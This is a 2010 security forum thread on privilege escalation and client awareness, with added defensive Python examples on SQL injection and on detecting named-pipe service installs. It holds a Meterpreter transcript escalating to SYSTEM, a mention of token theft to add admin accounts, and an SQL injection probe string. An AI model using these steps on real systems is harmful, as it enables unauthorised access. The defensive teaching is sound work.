Privilege escalation



Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Mon Aug 23, 2010 7:42 pm

Re: Privilege escalation

H1t M0nk3y wrote: As long as you can scare your clients, you know/hope they will fix their things.

It's never about "scaring" clients believe it or not. Raising awareness to them goes a hell of a lot longer. Most clients nowadays are aware of the risks but won't fully understand the extent of them.

Today I had to sit through a presentation with the owner of my company and a "Tony Robbins"-like sales coach (for lack of a better explanation) and explain to him in not-so-technical terms what it is I can do (we as a company). I briefly explained to him how extrusion and intrusion detection systems fail, as do firewalls. I had to tone it down to make things (the risks) understood.

After explaining it to him, he sort of got it but was shocked at the speed at which I could get into machines/networks. Now, this doesn't make me "uberhacker"; on the contrary, I could say it makes some clients "uberlackingincommon sense". Take a look at a vast majority of what people are calling "insider threats." Does someone clicking on a loaded link (backdoored pdf, doc, html link etc.) constitute an insider attack? You bet it does. Remember a reverse shell is someone connecting TO THE attacker. Kiss your firewall goodbye (when done properly.)

Awareness goes a long way. Clients don't want to be scared and it's not where you want them to be. Scared people don't think straight ;) Besides, they've already heard this routine time and time again: "Buy this firewall, guaranteed to stop...", "Oh you need this shiny sparkly blinky-light IPS", "What you really need is DLP" and the list goes on. What people REALLY need is awareness. Expressing this to a client is guaranteed to always keep you in mind with them.

Think about that for a bit... If it were you and you were speaking to say a family member, friend, colleague, golfing buddy etc., would you remember someone who scared you or someone who made you think in a more positive light?


Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Mon Aug 23, 2010 8:54 pm

Re: Privilege escalation

Sorry sil for my previous post. English isn't my mother tongue and although I rarely use this as an excuse, I really made a mistake.

I think exactly like you. I hate scaring people because, like you said, they start acting in panic mode. They also start to look at you with doubts. So I am sorry for what I wrote, I didn't mean that at all.

But again, we do different things. While you are a pentester, I work more with developers. They may not be IT security experts, but most of them can handle some technical stuff. They may not know the difference between a bind and a reverse shell, but they know it's a shell.

When you show to a developer that, for example, you were able to get a shell on the server through SQL injection because they didn't validate user input, they get scared! They understand enough to be scared.

So I really meant that, once you can demonstrate to them the risks associated with their action, and they realize the impact of these risks (and therefore, their actions), then they become aware like you said (and some scared a bit I guess).

But you are right, if I go see a car mechanic and he tells me: "You are crazy driving this car with almost no brakes. See how close you came to killing your family!!!", I wouldn't like it. I would much prefer him to tell me: "You really need to consider fixing your brakes ASAP. Here's how we can do it".

Thanks sil for explaining your point to me so nicely!  ;)
(aka H1t.M0nk3y)
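The post above describes showing developers a shell obtained through SQL injection because user input was not validated. The following Python example is added here and is not code from the thread or from either poster; it uses an in-memory sqlite3 database with constructed rows, and contrasts a string-concatenated query with a parameterised one plus an allow-list validator at the input boundary, so a developer can see exactly where the defence belongs.

```python
import re
import sqlite3


# Constructed in-memory sample database (not from the forum thread).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    return conn


def lookup_vulnerable(conn, username):
    # The caller's text is spliced into the SQL, so quotes and operators
    # inside it are parsed as part of the query itself.
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, username):
    # Parameterised query: the value is bound by the driver and is never
    # interpreted as SQL, whatever characters it contains.
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def is_valid_username(value):
    # Allow-list validation at the input boundary: anything that is not a
    # plain account name is rejected before it reaches the database layer.
    return USERNAME_RE.fullmatch(value) is not None


def demo():
    conn = make_db()
    probe = "x' OR '1'='1"  # constructed tautology input, not a real account name
    return {
        "vulnerable": lookup_vulnerable(conn, probe),   # returns every user
        "safe": lookup_safe(conn, probe),               # returns nothing
        "probe_accepted_by_validator": is_valid_username(probe),
        "alice_accepted_by_validator": is_valid_username("alice"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Validation and parameterisation are complementary: the allow-list stops junk at the edge, while binding parameters guarantees that even input which slips past a validator cannot change the shape of the query.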


Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Sat Aug 28, 2010 6:19 am

Re: Privilege escalation

Also, if we're talking network-level shell (not webapp/php/etc.) Metasploit has some built-in privilege escalation exploits in the priv module (meterpreter), and after Patch Tuesday a few weeks ago more should be coming ;)

meterpreter > use priv
Loading extension priv...success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.

-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Also, depending on your specific permission level you can use incognito to steal a token from a domain admin or user and add a new account for yourself with higher privs.
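From the blue-team side, technique 1 in the transcript above ("Service - Named Pipe Impersonation") is commonly documented as installing a temporary service whose binary path is a cmd.exe one-liner that echoes into a named pipe, which leaves a service-installation record (Windows System log event ID 7045) on the host. The Python example below is added here and is not code from the thread, from Metasploit or from the poster; it parses a constructed, simplified key=value rendering of such events (not real log lines) and flags service installs whose image path has that shape, which is the kind of check a SOC would run over collected System-log data.

```python
import re

# Constructed sample of Windows System-log service-installation events (ID 7045)
# flattened to a simple key=value line format; these are not real logs and the
# service names are made up.
SAMPLE_LOG = """\
EventID=7045 ServiceName=Spooler ImagePath="C:\\Windows\\System32\\spoolsv.exe"
EventID=7045 ServiceName=AbCdEfGh ImagePath="cmd.exe /c echo AbCdEfGh > \\\\.\\pipe\\AbCdEfGh"
EventID=4624 LogonType=3 TargetUserName=alice
EventID=7045 ServiceName=BackupAgent ImagePath="C:\\Program Files\\Backup\\agent.exe --service"
"""

# Matches only the constructed line layout above (an assumption of this example).
LINE_RE = re.compile(
    r'EventID=(?P<id>\d+)\s+ServiceName=(?P<svc>\S+)\s+ImagePath="(?P<img>[^"]*)"'
)


def parse_service_installs(log_text):
    """Yield (service_name, image_path) for each event-7045 record in the sample format."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group("id") == "7045":
            yield m.group("svc"), m.group("img")


def looks_like_pipe_impersonation(image_path):
    # Heuristic: a service whose "binary" is a cmd.exe one-liner redirecting an
    # echo into \\.\pipe\<name>. A legitimate service has no reason to be
    # registered this way, so the shape itself is the indicator.
    p = image_path.lower()
    return "cmd" in p and "/c echo" in p and ">" in p and "\\\\.\\pipe\\" in p


def detect(log_text):
    """Return the (service_name, image_path) pairs that match the heuristic."""
    return [
        (svc, img)
        for svc, img in parse_service_installs(log_text)
        if looks_like_pipe_impersonation(img)
    ]


if __name__ == "__main__":
    for svc, img in detect(SAMPLE_LOG):
        print(f"suspicious service install: {svc!r} -> {img}")
```

Real deployments would read the event through the Windows event log API or a SIEM rather than this toy line format, but the decision logic is the same: new-service events are rare on a stable host, so reviewing each 7045 record against a short list of "should never be a service binary" patterns is cheap and catches this class of escalation, as well as the follow-on account creation the post mentions when paired with monitoring of user-management events.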
